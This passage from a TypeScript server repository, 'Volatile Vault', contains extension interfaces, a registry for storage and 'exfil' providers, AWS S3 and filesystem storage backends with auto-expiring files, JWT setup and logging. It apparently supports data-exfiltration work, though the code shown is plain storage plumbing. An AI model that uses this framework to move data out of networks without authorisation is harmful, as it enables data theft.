initChunkUpload(storage: string, size: number): Promise; // TODO: Define info type 73 | initChunkDownload(info: FileInformation): Promise; 74 | uploadChunk(transferId: string, chunkNo: number, data: BinaryData): Promise; 75 | downloadChunk(transferId: string, chunkNo: number): Promise; 76 | 77 | // Hosts management 78 | addHost(): Promise; 79 | removeHost(host: string): Promise; 80 | } 81 | -------------------------------------------------------------------------------- /server/src/extensions/extension.ts: -------------------------------------------------------------------------------- 1 | import { Config } from '../config/config'; 2 | 3 | export type ExtensionState = 4 | | 'Uninitialized' 5 | | 'Initialized' 6 | | 'InitializationError' 7 | | 'Unconfigured'; 8 | 9 | export interface ExtensionInfo { 10 | name: string; 11 | displayName: string; 12 | info: object; 13 | } 14 | 15 | export interface FileUploadInformation { 16 | id?: string; // ID of an uploaded item 17 | url?: string; // URL at which to download the uploaded item 18 | creationDate?: Date; // Time at which the item was uploaded 19 | } 20 | 21 | export interface Extension { 22 | get name(): string; 23 | get capabilities(): CAP[]; 24 | get clientConfig(): ExtensionInfo; 25 | get state(): ExtensionState; 26 | 27 | supports(capability: CAP): boolean; 28 | 29 | init(cfg: Config): Promise; 30 | 31 | /** 32 | * Allows extensions to install their own cron jobs 33 | * 34 | * @returns {Promise} 35 | */ 36 | installCron(): Promise; 37 | } 38 | 39 | export abstract class BaseExtension 40 | implements Extension 41 | { 42 | public get name(): string { 43 | return this._name; 44 | } 45 | public get capabilities(): CAP[] { 46 | return this._capabilities; 47 | } 48 | public get state(): ExtensionState { 49 | return this._state; 50 | } 51 | protected set state(val: ExtensionState) { 52 | this._state = val; 53 | } 54 | 55 | private _name: string; 56 | private _state: ExtensionState = 'Uninitialized'; 57 | private _capabilities: CAP[]; 58 | protected cfg: Config; 59 | 60 | protected constructor(name: string, capabilities: CAP[]) { 61 | this._name = name; 62 | this._capabilities = capabilities; 63 | } 64 | 65 | abstract get clientConfig(): ExtensionInfo; 66 | 67 | public installCron(): Promise { 68 | return Promise.resolve(); 69 | } 70 | 71 | abstract init(cfg: Config): Promise; 72 | 73 | supports(capability: CAP): boolean { 74 | return this._capabilities.indexOf(capability) !== -1; 75 | } 76 | 77 | protected abstract register(); 78 | } 79 | -------------------------------------------------------------------------------- /server/src/extensions/repository.ts: -------------------------------------------------------------------------------- 1 | import { ExfilProvider } from './exfil/provider'; 2 | import { StorageProvider } from './storage/provider'; 3 | 4 | export class ExtensionRepository { 5 | private static instance: ExtensionRepository | null = null; 6 | 7 | private _storages: Map; 8 | private _exfils: Map; 9 | 10 | public get storages(): StorageProvider[] { 11 | return Array.from(this._storages.values()); 12 | } 13 | public get exfils(): ExfilProvider[] { 14 | return Array.from(this._exfils.values()); 15 | } 16 | 17 | private constructor() { 18 | this._storages = new Map(); 19 | this._exfils = new Map(); 20 | } 21 | 22 | public static getInstance(): ExtensionRepository { 23 | if (ExtensionRepository.instance == null) { 24 | ExtensionRepository.instance = new ExtensionRepository(); 25 | } 26 | 27 | return ExtensionRepository.instance; 28 | } 29 | 
30 | public registerStorage(storage: StorageProvider): void { 31 | if (this._storages.has(storage.name)) 32 | throw new Error(`Storage "${storage.name}" already registered!`); 33 | 34 | this._storages.set(storage.name, storage); 35 | } 36 | 37 | public getStorage(name: string): StorageProvider { 38 | if (!this._storages.has(name)) 39 | throw new Error(`Storage "${name}" not registered!`); 40 | 41 | return this._storages.get(name); 42 | } 43 | 44 | public async getStorageForFile(id: string): Promise { 45 | for (const storage of ExtensionRepository.getInstance().storages) { 46 | if (await storage.has(id)) return storage; 47 | } 48 | throw new Error('Unknown file'); 49 | } 50 | 51 | public registerExfil(exfil: ExfilProvider): void { 52 | if (this._exfils.has(exfil.name)) 53 | throw new Error(`Exfil "${exfil.name}" already registered!`); 54 | 55 | this._exfils.set(exfil.name, exfil); 56 | } 57 | 58 | public getExfil(name: string): ExfilProvider { 59 | if (!this._exfils.has(name)) 60 | throw new Error(`Exfil "${name}" not registered!`); 61 | 62 | return this._exfils.get(name); 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /server/src/extensions/storage/AwsS3/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - AwsS3 Storage

4 |
5 |
6 | 7 | This storage allows Volatile Vault to use AWS S3 buckets for file storage and retrieval. 8 | 9 | # Configuration 10 | 11 | Example: 12 | 13 | ```yaml 14 | --- 15 | storage: 16 | awss3: 17 | access_key_id: 18 | secret_access_key: 19 | region: 20 | bucket: 21 | user_arn: arn:aws:iam:::user/ 22 | max_size: 104857600 23 | file_expiry: 5 24 | generate_presigned_urls: true 25 | ``` 26 | 27 | Fields: 28 | 29 | - `access_key_id`: AWS IAM access key to use for authentication. 30 | - `secret_access_key`: AWS IAM secret access key to use for authentication. 31 | - `region`: AWS region to use when creating new buckets. 32 | - `bucket`: Name of the bucket to use (or create if non-existant). 33 | - `user_arn`: ARN of the user associated to the above credentials. Used to set permissions on the bucket. 34 | - `max_size`: Maximum allows size of files to store. 35 | - `file_expiry`: Duration (in minutes) after which files will be removed automatically. 36 | - `generate_presigned_urls`: Whether or not to generate presigned URLs (for public download) of uploaded files. 37 | 38 | > /!\ Note: In order for the automatic file deletion to work as expected, the bucket used with this extension needs to have specific permissions set to allow VolatileVault to query the "LastModified" field of files. The policy used for this operation can be found [here](./bucketpolicy.json). -------------------------------------------------------------------------------- /server/src/extensions/storage/AwsS3/awss3.ts: -------------------------------------------------------------------------------- 1 | import { Config, StorageAwsS3 } from 'src/config/config'; 2 | import winston from 'winston'; 3 | import { Logger } from '../../../logging'; 4 | import { 5 | BaseExtension, 6 | ExtensionInfo, 7 | FileUploadInformation, 8 | } from '../../extension'; 9 | import { ExtensionRepository } from '../../repository'; 10 | import { 11 | StorageData, 12 | StorageProvider, 13 | StorageProviderCapabilities, 14 | } from '../provider'; 15 | import { S3Wrapper } from './wrapper'; 16 | import cron from 'node-cron'; 17 | 18 | export class AwsS3StorageProvider 19 | extends BaseExtension 20 | implements StorageProvider 21 | { 22 | get clientConfig(): ExtensionInfo { 23 | return { 24 | name: AwsS3StorageProvider.NAME, 25 | displayName: 'AWS S3 Bucket', 26 | info: { 27 | max_size: this.config.max_size, 28 | file_expiry: this.config.file_expiry, 29 | }, 30 | }; 31 | } 32 | private static NAME: string = 'awss3'; 33 | private logger: winston.Logger; 34 | private client: S3Wrapper; 35 | 36 | public constructor() { 37 | super(AwsS3StorageProvider.NAME, ['None']); 38 | this.logger = Logger.Instance.createChildLogger('AwsS3'); 39 | } 40 | 41 | async init(cfg: Config): Promise { 42 | this.cfg = cfg; 43 | if (this.config) { 44 | this.logger.debug('Initializing S3 client...'); 45 | this.client = new S3Wrapper( 46 | this.config.access_key_id, 47 | this.config.secret_access_key, 48 | this.config.region, 49 | this.config.bucket, 50 | this.config.file_expiry, 51 | this.config.user_arn 52 | ); 53 | 54 | this.logger.debug('Validating credentials...'); 55 | if ((await this.client.validateCredentials()) == false) { 56 | this.state = 'InitializationError'; 57 | return; 58 | } 59 | 60 | await this.client.createBucketIfNotExists(); 61 | 62 | this.logger.info('Initialized & validated credentials'); 63 | this.register(); 64 | this.state = 'Initialized'; 65 | } else { 66 | this.logger.debug('Config not set'); 67 | this.state = 'Unconfigured'; 68 | } 69 | } 70 | 71 | protected 
register() { 72 | ExtensionRepository.getInstance().registerStorage(this); 73 | } 74 | 75 | get config(): StorageAwsS3 { 76 | return this.cfg.storage.awss3; 77 | } 78 | 79 | has(id: string): Promise { 80 | return this.client.fileExists(id); 81 | } 82 | 83 | async store(data: StorageData): Promise { 84 | this.logger.debug(`Uploading ${data.size} bytes`); 85 | const id = await this.client.uploadFile(data.stream); 86 | this.logger.debug(`Done: ${id}`); 87 | var url: string | undefined = undefined; 88 | if (this.config.generate_presigned_urls) 89 | url = await this.client.getPresignedUrl(id); 90 | 91 | return { 92 | id, 93 | url, 94 | creationDate: new Date(Date.now()), 95 | }; 96 | } 97 | 98 | async retrieve(info: FileUploadInformation): Promise { 99 | const [stream, size] = await this.client.downloadFile(info.id); 100 | return { 101 | size, 102 | stream, 103 | }; 104 | } 105 | 106 | async remove(info: FileUploadInformation): Promise { 107 | await this.client.removeFile(info.id); 108 | } 109 | 110 | public override installCron(): Promise { 111 | cron.schedule('0 * * * * *', () => this.client.deleteOldFiles()); 112 | return Promise.resolve(); 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /server/src/extensions/storage/AwsS3/bucketpolicy.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": "2012-10-17", 3 | "Statement": [ 4 | { 5 | "Effect": "Allow", 6 | "Principal": { 7 | "AWS": "" 8 | }, 9 | "Action": "s3:GetObject", 10 | "Resource": "", 11 | "Condition": { 12 | "StringEquals": { 13 | "s3:ExistingObjectTag/HasMetadata": "true" 14 | } 15 | } 16 | } 17 | ] 18 | } 19 | -------------------------------------------------------------------------------- /server/src/extensions/storage/AwsS3/wrapper.ts: -------------------------------------------------------------------------------- 1 | import { 2 | BucketLocationConstraint, 3 | CreateBucketCommand, 4 | DeleteObjectCommand, 5 | GetObjectCommand, 6 | HeadBucketCommand, 7 | HeadObjectCommand, 8 | ListObjectsV2Command, 9 | PutBucketPolicyCommand, 10 | PutObjectCommand, 11 | S3Client, 12 | } from '@aws-sdk/client-s3'; 13 | import { Upload } from '@aws-sdk/lib-storage'; 14 | import { Logger } from '../../../logging'; 15 | import winston from 'winston'; 16 | import { Readable } from 'node:stream'; 17 | import ShortUniqueId from 'short-unique-id'; 18 | import { getSignedUrl } from '@aws-sdk/s3-request-presigner'; 19 | import moment from 'moment'; 20 | import bucketpolicy from './bucketpolicy.json'; 21 | 22 | const fileids = new ShortUniqueId({ length: 6, dictionary: 'alpha_upper' }); 23 | 24 | export class S3Wrapper { 25 | private client: S3Client; 26 | private logger: winston.Logger; 27 | private bucket: string; 28 | private region: string; 29 | private lifetime: number; 30 | private user_arn: string; 31 | 32 | public constructor( 33 | accessKeyId: string, 34 | secretAccessKey: string, 35 | region: string, 36 | bucket: string, 37 | lifetime: number, 38 | user_arn: string 39 | ) { 40 | this.client = new S3Client({ 41 | credentials: { 42 | accessKeyId, 43 | secretAccessKey, 44 | }, 45 | apiVersion: 'latest', 46 | region, 47 | }); 48 | this.bucket = bucket; 49 | this.region = region; 50 | this.lifetime = lifetime; 51 | this.user_arn = user_arn; 52 | this.logger = Logger.Instance.createChildLogger('AwsS3Wrapper'); 53 | } 54 | 55 | public async createBucketIfNotExists(): Promise { 56 | try { 57 | await this.client.send(new HeadBucketCommand({ Bucket: 
this.bucket })); 58 | this.logger.debug(`Bucket ${this.bucket} exists!`); 59 | } catch (error) { 60 | if (error.name === 'NotFound') { 61 | this.logger.debug(`Bucket ${this.bucket} does not exist; creating...`); 62 | await this.createBucket(); 63 | this.logger.debug(`Setting bucket policy...`); 64 | await this.setBucketPolicy(); 65 | this.logger.info(`Bucket ${this.bucket} created & configured!`); 66 | } else { 67 | throw error; 68 | } 69 | } 70 | } 71 | 72 | private async createBucket(): Promise { 73 | try { 74 | const command = new CreateBucketCommand({ 75 | Bucket: this.bucket, 76 | CreateBucketConfiguration: { 77 | LocationConstraint: BucketLocationConstraint[this.region], 78 | }, 79 | }); 80 | await this.client.send(command); 81 | this.logger.info(`Created bucket ${this.bucket}!`); 82 | } catch (error) { 83 | this.logger.error( 84 | `Failed to create bucket: ${error?.name} ${error?.message ?? error}` 85 | ); 86 | throw error; 87 | } 88 | } 89 | 90 | private async setBucketPolicy(): Promise { 91 | var policy = bucketpolicy; 92 | 93 | policy.Statement[0].Principal.AWS = this.user_arn; 94 | policy.Statement[0].Resource = `arn:aws:s3:::${this.bucket}/*`; 95 | 96 | const params = { 97 | Bucket: this.bucket, 98 | Policy: JSON.stringify(policy), 99 | }; 100 | 101 | const command = new PutBucketPolicyCommand(params); 102 | 103 | try { 104 | await this.client.send(command); 105 | this.logger.info(`Configured bucket policy for ${this.bucket}!`); 106 | } catch (error) { 107 | this.logger.error( 108 | `Failed to set bucket policy: ${error?.name} ${error?.message ?? error}` 109 | ); 110 | throw error; 111 | } 112 | } 113 | 114 | public async validateCredentials(): Promise { 115 | try { 116 | await this.client.send(new HeadBucketCommand({ Bucket: this.bucket })); 117 | return true; 118 | } catch (error) { 119 | if ( 120 | error.name === 'InvalidAccessKeyId' || 121 | error.name === 'SignatureDoesNotMatch' 122 | ) { 123 | return false; 124 | } else if (error.name === 'NotFound') { 125 | return true; 126 | } else { 127 | this.logger.error( 128 | `Failed validating AWS S3 credentials: ${error?.name} ${ 129 | error?.message ?? error 130 | }` 131 | ); 132 | throw error; 133 | } 134 | } 135 | } 136 | 137 | public async fileExists(id: string): Promise { 138 | const headObjectParams = { 139 | Bucket: this.bucket, 140 | Key: id, 141 | }; 142 | const command = new HeadObjectCommand(headObjectParams); 143 | 144 | try { 145 | await this.client.send(command); 146 | return true; 147 | } catch (error) { 148 | if (error.name === 'NotFound') { 149 | return false; 150 | } else { 151 | this.logger.error( 152 | `Failed to query object: ${error?.name} ${error?.message ?? error}` 153 | ); 154 | throw error; 155 | } 156 | } 157 | } 158 | 159 | public async downloadFile(id: string): Promise<[Readable, number]> { 160 | const getObjectParams = { 161 | Bucket: this.bucket, 162 | Key: id, 163 | }; 164 | const command = new GetObjectCommand(getObjectParams); 165 | 166 | try { 167 | const response = await this.client.send(command); 168 | const body = response.Body as Readable; 169 | return [body, response.ContentLength]; 170 | } catch (error) { 171 | this.logger.error( 172 | `Failed to download file: ${error?.name} ${error?.message ?? 
error}` 173 | ); 174 | throw error; 175 | } 176 | } 177 | 178 | public async uploadFile(data: Readable): Promise<string> { 179 | const id = fileids.rnd(); 180 | 181 | const uploader = new Upload({ 182 | client: this.client, 183 | params: { 184 | Bucket: this.bucket, 185 | Key: id, 186 | Body: data, 187 | }, 188 | }); 189 | 190 | try { 191 | await uploader.done(); 192 | return id; 193 | } catch (error) { 194 | this.logger.error( 195 | `Failed to upload file: ${error?.name} ${error?.message ?? error}` 196 | ); 197 | throw error; 198 | } 199 | } 200 | 201 | public async removeFile(id: string): Promise<void> { 202 | const command = new DeleteObjectCommand({ 203 | Bucket: this.bucket, 204 | Key: id, 205 | }); 206 | 207 | try { 208 | await this.client.send(command); 209 | } catch (error) { 210 | this.logger.error( 211 | `Failed to remove file: ${error?.name} ${error?.message ?? error}` 212 | ); 213 | throw error; 214 | } 215 | } 216 | 217 | public async getPresignedUrl(id: string): Promise<string> { 218 | const getObjectParams = { 219 | Bucket: this.bucket, 220 | Key: id, 221 | }; 222 | const command = new GetObjectCommand(getObjectParams); 223 | const url = await getSignedUrl(this.client, command, { 224 | expiresIn: this.lifetime * 60, 225 | }); 226 | return url; 227 | } 228 | 229 | public async deleteOldFiles(): Promise<void> { 230 | const listCommand = new ListObjectsV2Command({ 231 | Bucket: this.bucket, 232 | }); 233 | 234 | try { 235 | const listObjectsResponse = await this.client.send(listCommand); 236 | if (!listObjectsResponse.Contents) return; 237 | 238 | const now = moment(); 239 | const objectsToDelete = listObjectsResponse.Contents.filter((object) => { 240 | const lastModified = object.LastModified!; 241 | const ageInMinutes = now.diff(moment(lastModified), 'minutes'); 242 | return ageInMinutes > this.lifetime; 243 | }); 244 | 245 | for (const object of objectsToDelete) { 246 | this.logger.debug(`Removing expired file ${object.Key}`); 247 | await this.removeFile(object.Key!); 248 | } 249 | } catch (error) { 250 | this.logger.error( 251 | `Failed to remove expired files: ${error?.name} ${ 252 | error?.message ?? error 253 | }` 254 | ); 255 | throw error; 256 | } 257 | } 258 | } 259 | --------------------------------------------------------------------------------
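For illustration only, a minimal sketch of how the `S3Wrapper` above might be driven on its own. The credentials, bucket name and ARN below are placeholders (not real configuration), and error handling is omitted:

```typescript
// Hypothetical, standalone use of S3Wrapper (server/src/extensions/storage/AwsS3/wrapper.ts).
// All literal values below are placeholders, not real configuration.
import { Readable } from 'node:stream';
import { S3Wrapper } from './wrapper';

async function demo(): Promise<void> {
  const s3 = new S3Wrapper(
    'AKIA................', // accessKeyId (placeholder)
    'secret-access-key', // secretAccessKey (placeholder)
    'eu-central-1', // region
    'volatile-vault-demo', // bucket
    60, // lifetime in minutes, analogous to file_expiry
    'arn:aws:iam::123456789012:user/vault' // user_arn inserted into the bucket policy
  );

  // Creates and configures the bucket on first use, then uploads a stream
  // and requests a time-limited presigned download URL for the new object.
  await s3.createBucketIfNotExists();
  const id = await s3.uploadFile(Readable.from(Buffer.from('hello world')));
  const url = await s3.getPresignedUrl(id);
  console.log(`Stored ${id}, presigned URL: ${url}`);
}
```

Note how `getPresignedUrl` derives the URL's expiry from the configured lifetime in minutes, converted to seconds (`expiresIn: this.lifetime * 60`).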
/server/src/extensions/storage/FileSystem/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Volatile Vault - FileSystem Storage 4 | 5 | 
6 | 7 | This storage allows Volatile Vault to store files to and retrieve them from its hard drive. 8 | 9 | # Configuration 10 | 11 | Example: 12 | 13 | ```yaml 14 | --- 15 | storage: 16 | filesystem: 17 | folder: './files_basic' 18 | max_size: 104857600 19 | file_expiry: 60 20 | ``` 21 | 22 | Fields: 23 | 24 | - `folder`: Absolute or relative folder to store files in. 25 | - `max_size`: Maximum allowed size of files to store, in bytes. 26 | - `file_expiry`: Duration (in minutes) after which files will be removed automatically. 27 | -------------------------------------------------------------------------------- /server/src/extensions/storage/FileSystem/filesystem.ts: -------------------------------------------------------------------------------- 1 | import { 2 | StorageData, 3 | StorageProvider, 4 | StorageProviderCapabilities, 5 | } from '../provider'; 6 | import { BaseExtension, ExtensionInfo, FileUploadInformation } from '../../extension'; 7 | import { 8 | StorageFileSystem, 9 | Config, 10 | } from '../../../config/config'; 11 | import { FsUtils } from '../../../fs'; 12 | import { ExtensionRepository } from '../../repository'; 13 | import cron from 'node-cron'; 14 | import winston from 'winston'; 15 | import { Logger } from '../../../logging'; 16 | 17 | export class FileSystemStorageProvider 18 | extends BaseExtension 19 | implements StorageProvider 20 | { 21 | get clientConfig(): ExtensionInfo { 22 | return { 23 | name: FileSystemStorageProvider.NAME, 24 | displayName: 'Server Filesystem', 25 | info: { 26 | max_size: this.config.max_size, 27 | file_expiry: this.config.file_expiry, 28 | }, 29 | }; 30 | } 31 | private static NAME: string = 'filesystem'; 32 | private logger: winston.Logger; 33 | private fs: FsUtils; 34 | 35 | public constructor() { 36 | super(FileSystemStorageProvider.NAME, ['None']); 37 | this.logger = Logger.Instance.createChildLogger('FileSystem'); 38 | this.fs = new FsUtils(FileSystemStorageProvider.NAME); 39 | } 40 | get config(): StorageFileSystem { 41 | return this.cfg.storage.filesystem; 42 | } 43 | 44 | async has(id: string): Promise<boolean> { 45 | return await this.fs.hasFile(id); 46 | } 47 | 48 | protected register() { 49 | ExtensionRepository.getInstance().registerStorage(this); 50 | } 51 | 52 | async init(cfg: Config): Promise<void> { 53 | this.cfg = cfg; 54 | 55 | if (this.config) { 56 | await this.fs.init(this.config.folder); 57 | this.logger.info('Initialized'); 58 | this.register(); 59 | } else { 60 | this.logger.debug('Config not set'); 61 | } 62 | } 63 | 64 | async store(data: StorageData): Promise<FileUploadInformation> { 65 | this.logger.debug(`Storing ${data.size} bytes`); 66 | const info = await this.fs.putFile(data.stream); 67 | this.logger.debug(`Done: ${info.id}`); 68 | return { 69 | creationDate: info.creationDate, 70 | id: info.id, 71 | }; 72 | } 73 | 74 | async retrieve(info: FileUploadInformation): Promise<StorageData> { 75 | const [stream, size] = await this.fs.getFile(info.id); 76 | return { 77 | stream, 78 | size, 79 | }; 80 | } 81 | 82 | async remove(info: FileUploadInformation): Promise<void> { 83 | await this.fs.removeFile(info.id); 84 | } 85 | 86 | public override installCron(): Promise<void> { 87 | cron.schedule('0 * * * * *', () => { 88 | this.fs.cleanup(1000 * 60 * this.config.file_expiry); 89 | }); 90 | return Promise.resolve(); 91 | } 92 | } 93 | -------------------------------------------------------------------------------- /server/src/extensions/storage/provider.ts: -------------------------------------------------------------------------------- 1 | import { Readable } from 'node:stream'; 2 | 
import { Extension, FileUploadInformation } from '../extension'; 3 | import { BaseStorage } from '../../config/config'; 4 | 5 | 6 | /** 7 | * Holds a binary stream and its length 8 | * 9 | * @export 10 | * @interface StorageData 11 | * @typedef {StorageData} 12 | */ 13 | export interface StorageData { 14 | stream: Readable; // Stream to read binary contents from 15 | size: number; // Length of stream 16 | } 17 | 18 | /** 19 | * Enum that lets storage providers declare their supported capabilities 20 | * 21 | * @export 22 | * @enum {number} 23 | */ 24 | export type StorageProviderCapabilities = 'None' | 'Reserved' | 'Remove'; 25 | 26 | /** 27 | * Basic interface for file storage/retrieval 28 | * 29 | * @export 30 | * @interface StorageProvider 31 | * @typedef {StorageProvider} 32 | */ 33 | export interface StorageProvider 34 | extends Extension { 35 | get config() : BaseStorage; 36 | has(id: string): Promise<boolean>; 37 | store(data: StorageData): Promise<FileUploadInformation>; 38 | retrieve(info: FileUploadInformation): Promise<StorageData>; 39 | remove(info: FileUploadInformation): Promise<void>; 40 | } 41 | --------------------------------------------------------------------------------
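To make the StorageProvider contract above more tangible, here is a rough in-memory sketch of its four data methods. It is not part of the repository: it omits the Extension base members, assumes it would sit next to provider.ts (hence the import paths), and assumes FileUploadInformation consists of an `id`, a `creationDate` and an optional `url`, as suggested by the providers above.

```typescript
// Illustrative only: an in-memory take on the has/store/retrieve/remove
// contract from provider.ts. Not a drop-in StorageProvider implementation.
import { Readable } from 'node:stream';
import { StorageData } from './provider';
import { FileUploadInformation } from '../extension';

class InMemoryStorageSketch {
  private blobs = new Map<string, Buffer>();

  async has(id: string): Promise<boolean> {
    return this.blobs.has(id);
  }

  async store(data: StorageData): Promise<FileUploadInformation> {
    // Buffer the incoming stream; real providers stream to disk or S3 instead.
    const chunks: Buffer[] = [];
    for await (const chunk of data.stream) chunks.push(Buffer.from(chunk));
    const id = Math.random().toString(36).slice(2, 8).toUpperCase();
    this.blobs.set(id, Buffer.concat(chunks));
    return { id, creationDate: new Date() };
  }

  async retrieve(info: FileUploadInformation): Promise<StorageData> {
    const buf = this.blobs.get(info.id);
    if (!buf) throw new Error(`File "${info.id}" not found`);
    return { stream: Readable.from(buf), size: buf.length };
  }

  async remove(info: FileUploadInformation): Promise<void> {
    this.blobs.delete(info.id);
  }
}
```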
/server/src/fs.ts: -------------------------------------------------------------------------------- 1 | import fsSync, { ReadStream } from 'fs'; 2 | import fs, { constants } from 'fs/promises'; 3 | import { Readable } from 'node:stream'; 4 | import path from 'path'; 5 | import ShortUniqueId from 'short-unique-id'; 6 | import { pipeline } from 'stream/promises'; 7 | import winston from 'winston'; 8 | import { Logger } from './logging'; 9 | 10 | export interface FileInfo { 11 | id: string; 12 | creationDate: Date; 13 | } 14 | 15 | interface FsDatabase { 16 | getFiles(): Promise<FileInfo[]>; 17 | getFile(id: string): Promise<FileInfo>; 18 | removeFile(id: string): Promise<void>; 19 | putFile(): Promise<FileInfo>; 20 | } 21 | 22 | const fileids = new ShortUniqueId({ length: 6, dictionary: 'alpha_upper' }); 23 | 24 | class InMemoryDatabase implements FsDatabase { 25 | private files: FileInfo[] = []; 26 | 27 | private static firstOrDefault<T>(items: T[]): T | null { 28 | return items?.length ? items[0] : null; 29 | } 30 | 31 | async getFiles(): Promise<FileInfo[]> { 32 | return this.files; 33 | } 34 | 35 | async getFile(id: string): Promise<FileInfo> { 36 | const file: FileInfo | null = InMemoryDatabase.firstOrDefault( 37 | this.files.filter((f) => f.id == id) 38 | ); 39 | if (file === null) throw `File with id "${id}" not found!`; 40 | return file; 41 | } 42 | 43 | async removeFile(id: string): Promise<void> { 44 | try { 45 | const file = await this.getFile(id); 46 | this.files = this.files.filter((f) => f.id != id); 47 | } catch (error) { 48 | throw error; 49 | } 50 | } 51 | 52 | async putFile(): Promise<FileInfo> { 53 | const id = fileids.rnd(); 54 | if (InMemoryDatabase.firstOrDefault(this.files.filter((f) => f.id == id))) 55 | throw `File with id "${id}" already exists!`; 56 | 57 | var _file = { 58 | id: id, 59 | creationDate: new Date(Date.now()), 60 | }; 61 | this.files.push(_file); 62 | 63 | return _file; 64 | } 65 | } 66 | 67 | export class FsUtils { 68 | private db: FsDatabase = new InMemoryDatabase(); 69 | private dir: string; 70 | private logger: winston.Logger; 71 | 72 | public constructor(name: string) { 73 | this.logger = Logger.Instance.createChildLogger(`FS:${name}`); 74 | } 75 | 76 | public async init(dir: string): Promise<void> { 77 | this.dir = path.resolve(dir); 78 | 79 | if (await this.exists(this.dir)) { 80 | this.logger.info(`Removing ${this.dir}`); 81 | await fs.rm(this.dir, { recursive: true, force: true }); 82 | } 83 | this.logger.info(`Creating ${this.dir}`); 84 | await fs.mkdir(this.dir, { recursive: true }); 85 | } 86 | 87 | private async exists(path: string): Promise<boolean> { 88 | try { 89 | await fs.access(path, constants.R_OK | constants.W_OK); 90 | return true; 91 | } catch { 92 | return false; 93 | } 94 | } 95 | 96 | public async getFiles(): Promise<FileInfo[]> { 97 | return this.db.getFiles(); 98 | } 99 | 100 | public async hasFile(id: string): Promise<boolean> { 101 | return await this.exists(path.join(this.dir, id)); 102 | } 103 | 104 | public async getFile(id: string): Promise<[ReadStream, number]> { 105 | const _file: FileInfo | null = await this.db.getFile(id); 106 | const _path = path.join(this.dir, _file.id); 107 | if (!(await this.exists(_path))) throw `File "${_path}" does not exist!`; 108 | 109 | var stat = await fs.stat(_path); 110 | return [fsSync.createReadStream(_path, { flags: 'r' }), stat.size]; 111 | } 112 | 113 | public async putFile(data: Readable): Promise<FileInfo> { 114 | this.logger.debug('Putting file...'); 115 | const file = await this.db.putFile(); 116 | this.logger.debug(`File: ${file.id}`); 117 | var str = fsSync.createWriteStream(path.join(this.dir, file.id), { 118 | flags: 'w', 119 | encoding: 'binary', 120 | }); 121 | this.logger.debug(`Writing to ${str.path}...`); 122 | await pipeline(data, str); 123 | this.logger.debug('Done!'); 124 | return file; 125 | } 126 | 127 | public async removeFile(id: string): Promise<void> { 128 | this.logger.debug(`Removing ${id} from db...`); 129 | await this.db.removeFile(id); 130 | this.logger.debug(`Removing ${id} from disk...`); 131 | fsSync.rmSync(path.join(this.dir, id)); 132 | } 133 | 134 | public async cleanup(ageMs: number): Promise<void> { 135 | var now = new Date(Date.now()); 136 | for (const file of await this.db.getFiles()) { 137 | if (now.getTime() - file.creationDate.getTime() >= ageMs) { 138 | this.logger.info(`Removing ${file.id}`); 139 | await fs.rm(path.join(this.dir, file.id), { force: true }); 140 | await this.db.removeFile(file.id); 141 | } 142 | } 143 | } 144 | } 145 | -------------------------------------------------------------------------------- 
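As a quick, hypothetical illustration of the FsUtils API above (the folder name and payload are made up; in the server it is the FileSystemStorageProvider that makes these calls):

```typescript
// Sketch only: exercising FsUtils (server/src/fs.ts) directly.
import { Readable } from 'node:stream';
import { FsUtils } from './fs';

async function demo(): Promise<void> {
  const utils = new FsUtils('Demo');
  await utils.init('./files_demo'); // wipes and recreates the folder

  const info = await utils.putFile(Readable.from(Buffer.from('payload')));
  const [stream, size] = await utils.getFile(info.id);
  console.log(`Stored ${info.id} (${size} bytes)`);
  stream.destroy(); // not consumed in this sketch

  // Mirror the provider's cron job: drop everything older than 60 minutes.
  await utils.cleanup(1000 * 60 * 60);
}
```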
/server/src/jwt.ts: -------------------------------------------------------------------------------- 1 | import { expressjwt } from 'express-jwt'; 2 | import { generateKeyPairSync } from 'crypto'; 3 | 4 | export class Keys { 5 | private static instance: Keys = null; 6 | private privKey: string; 7 | private pubKey: string; 8 | public get privateKey() { 9 | return this.privKey; 10 | } 11 | public get publicKey() { 12 | return this.pubKey; 13 | } 14 | 15 | public static getInstance(): Keys { 16 | if (Keys.instance != null) return Keys.instance; 17 | Keys.instance = new Keys(); 18 | 19 | const res = generateKeyPairSync('rsa', { 20 | modulusLength: 4096, 21 | publicKeyEncoding: { 22 | type: 'spki', 23 | format: 'pem', 24 | }, 25 | privateKeyEncoding: { 26 | type: 'pkcs8', 27 | format: 'pem', 28 | }, 29 | }); 30 | Keys.instance.privKey = res.privateKey; 31 | Keys.instance.pubKey = res.publicKey; 32 | 33 | return Keys.instance; 34 | } 35 | } 36 | 37 | export const jwt = expressjwt({ 38 | secret: Keys.getInstance().publicKey, 39 | algorithms: ['RS512'], 40 | }); 41 | -------------------------------------------------------------------------------- /server/src/logging.ts: -------------------------------------------------------------------------------- 1 | import winston from 'winston'; 2 | import path from 'path'; 3 | import process from 'process'; 4 | 5 | export class Logger { 6 | private logger: winston.Logger; 7 | private static instance: Logger = null; 8 | 9 | public static get Instance(): Logger { 10 | if (Logger.instance == null) Logger.instance = new Logger(); 11 | 12 | return Logger.instance; 13 | } 14 | 15 | private constructor() { 16 | this.logger = winston.createLogger({ 17 | defaultMeta: { mainLabel: 'Server' }, 18 | level: 'debug', 19 | format: winston.format.combine( 20 | winston.format.timestamp({ format: 'YYYY-MM-DD HH:mm:ss.SSS' }), 21 | winston.format.align(), 22 | winston.format.printf( 23 | ({ message, timestamp, level, mainLabel, childLabel }) => { 24 | return `${timestamp} (${ 25 | childLabel || mainLabel 26 | }) [${level}] -> ${message}`; 27 | } 28 | ) 29 | ), 30 | transports: [ 31 | new winston.transports.Console(), 32 | new winston.transports.File({ 33 | filename: path.join(process.cwd(), 'logs', 'volatilevault.log'), 34 | lazy: true, 35 | maxsize: 100 * 1024 * 1024, // 100MB 36 | maxFiles: 10, 37 | tailable: true, 38 | zippedArchive: true, 39 | }), 40 | ], 41 | }); 42 | } 43 | 44 | public get defaultLogger(): winston.Logger { 45 | return this.logger; 46 | } 47 | public createChildLogger(label: string): winston.Logger { 48 | return this.logger.child({ childLabel: label }); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /server/src/routes/auth.ts: -------------------------------------------------------------------------------- 1 | import express, { Request, Response } from 'express'; 2 | import jwt from 'jsonwebtoken'; 3 | import OTPAuth from 'otpauth'; 4 | import 